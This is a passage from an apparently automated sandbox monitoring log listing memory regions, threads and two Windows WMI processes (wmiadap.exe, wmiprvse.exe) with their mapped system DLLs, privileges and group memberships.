filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 6212
start_va = 0x75030000
end_va = 0x75058fff
entry_point = 0x75030000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 6213
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 6214
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 6215
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 6216
start_va = 0x750f0000
end_va = 0x7511cfff
entry_point = 0x750f0000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 6217
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 6218
start_va = 0x752d0000
end_va = 0x752f6fff
entry_point = 0x752d0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 6219
start_va = 0x75300000
end_va = 0x75311fff
entry_point = 0x75300000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 6220
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 6221
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 6222
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 6223
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 6224
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 6225
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 6226
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 6227
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 6228
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 6229
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 6230
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 6231
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 6232
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 6233
start_va = 0x76c00000
end_va = 0x76d9cfff
entry_point = 0x76c00000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 6234
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 6235
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 6236
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 6237
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 6238
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 6239
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 6240
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 6241
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 6242
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 6243
start_va = 0x7ffa5000
end_va = 0x7ffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa5000"
filename = ""
Region:
id = 6244
start_va = 0x7ffa6000
end_va = 0x7ffa6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa6000"
filename = ""
Region:
id = 6245
start_va = 0x7ffa8000
end_va = 0x7ffa8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa8000"
filename = ""
Region:
id = 6246
start_va = 0x7ffa9000
end_va = 0x7ffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa9000"
filename = ""
Region:
id = 6247
start_va = 0x7ffaa000
end_va = 0x7ffaafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffaa000"
filename = ""
Region:
id = 6248
start_va = 0x7ffac000
end_va = 0x7ffacfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffac000"
filename = ""
Region:
id = 6249
start_va = 0x7ffad000
end_va = 0x7ffadfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffad000"
filename = ""
Region:
id = 6250
start_va = 0x7ffae000
end_va = 0x7ffaefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffae000"
filename = ""
Region:
id = 6251
start_va = 0x7ffaf000
end_va = 0x7ffaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffaf000"
filename = ""
Region:
id = 6252
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 6253
start_va = 0x7ffd3000
end_va = 0x7ffd3fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd3000"
filename = ""
Region:
id = 6254
start_va = 0x7ffd4000
end_va = 0x7ffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd4000"
filename = ""
Region:
id = 6255
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 6256
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 6257
start_va = 0x7ffd7000
end_va = 0x7ffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd7000"
filename = ""
Region:
id = 6258
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 6259
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 6260
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 6261
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 6262
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 6263
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 6264
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Thread:
id = 301
os_tid = 0x5d0
Thread:
id = 302
os_tid = 0xe4c
Thread:
id = 303
os_tid = 0xe48
Thread:
id = 304
os_tid = 0xa28
Thread:
id = 305
os_tid = 0x920
Thread:
id = 306
os_tid = 0x154
Thread:
id = 307
os_tid = 0x150
Thread:
id = 308
os_tid = 0x73c
Thread:
id = 309
os_tid = 0x434
Thread:
id = 310
os_tid = 0x424
Thread:
id = 311
os_tid = 0x390
Thread:
id = 312
os_tid = 0x388
Thread:
id = 313
os_tid = 0x378
Thread:
id = 314
os_tid = 0x328
Thread:
id = 315
os_tid = 0x324
Thread:
id = 316
os_tid = 0x320
Thread:
id = 317
os_tid = 0x2fc
Thread:
id = 318
os_tid = 0x2f8
Thread:
id = 319
os_tid = 0x2d4
Thread:
id = 320
os_tid = 0x2cc
Thread:
id = 365
os_tid = 0xa7c
Process:
id = "51"
image_name = "wmiadap.exe"
filename = "c:\\windows\\system32\\wbem\\wmiadap.exe"
page_root = "0x7f1be920"
os_pid = "0x4f0"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0x338"
cmd_line = "wmiadap.exe /F /T /R"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000ac6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 6265
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 6266
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 6267
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 6268
start_va = 0x190000
end_va = 0x1cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 6269
start_va = 0xf70000
end_va = 0xf8efff
entry_point = 0xf70000
region_type = mapped_file
name = "wmiadap.exe"
filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe")
Region:
id = 6270
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 6271
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 6272
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 6273
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 6274
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 6275
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 6276
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 6277
start_va = 0x2a0000
end_va = 0x2affff
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 6278
start_va = 0x2e0000
end_va = 0x3dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 6279
start_va = 0x6d800000
end_va = 0x6d81efff
entry_point = 0x6d800000
region_type = mapped_file
name = "loadperf.dll"
filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll")
Region:
id = 6280
start_va = 0x6e780000
end_va = 0x6e7dbfff
entry_point = 0x6e780000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 6281
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 6282
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 6283
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 6284
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 6285
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 6286
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 6287
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 6288
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 6289
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 6290
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 6291
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 6292
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 6293
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 6294
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 6295
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 6296
start_va = 0xc0000
end_va = 0x187fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 6297
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 6298
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 6299
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 6300
start_va = 0x1d0000
end_va = 0x24ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 6301
start_va = 0x250000
end_va = 0x251fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 6302
start_va = 0x260000
end_va = 0x260fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 6303
start_va = 0x270000
end_va = 0x270fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 6304
start_va = 0x3e0000
end_va = 0x4e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 6305
start_va = 0x5a0000
end_va = 0x5dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 6306
start_va = 0x720000
end_va = 0x75ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000720000"
filename = ""
Region:
id = 6307
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 6308
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 6309
start_va = 0x280000
end_va = 0x280fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000280000"
filename = ""
Region:
id = 6310
start_va = 0x530000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 6311
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 6312
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 6313
start_va = 0x290000
end_va = 0x290fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 6314
start_va = 0x6e580000
end_va = 0x6e589fff
entry_point = 0x6e580000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 6315
start_va = 0x4f0000
end_va = 0x52ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 6316
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 6317
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 6318
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 6319
start_va = 0x760000
end_va = 0xa2efff
entry_point = 0x760000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 6320
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 6321
start_va = 0x5e0000
end_va = 0x61ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 6322
start_va = 0xaa0000
end_va = 0xadffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000aa0000"
filename = ""
Region:
id = 6323
start_va = 0x6e450000
end_va = 0x6e45efff
entry_point = 0x6e450000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 6324
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 6325
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 6326
start_va = 0x6e590000
end_va = 0x6e5a7fff
entry_point = 0x6e590000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 6327
start_va = 0x6e5b0000
end_va = 0x6e645fff
entry_point = 0x6e5b0000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 6328
start_va = 0x77060000
end_va = 0x77064fff
entry_point = 0x77060000
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 6743
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 6744
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Thread:
id = 322
os_tid = 0x904
Thread:
id = 323
os_tid = 0x91c
Thread:
id = 324
os_tid = 0x924
Thread:
id = 325
os_tid = 0x47c
Thread:
id = 326
os_tid = 0x938
Thread:
id = 327
os_tid = 0x934
Process:
id = "52"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x7f1be940"
os_pid = "0x918"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "3"
os_parent_pid = "0x338"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000ac6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 6329
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 6330
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 6331
start_va = 0xd0000
end_va = 0x10ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 6332
start_va = 0x190000
end_va = 0x28ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 6333
start_va = 0x6f0000
end_va = 0x730fff
entry_point = 0x6f0000
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 6334
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 6335
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
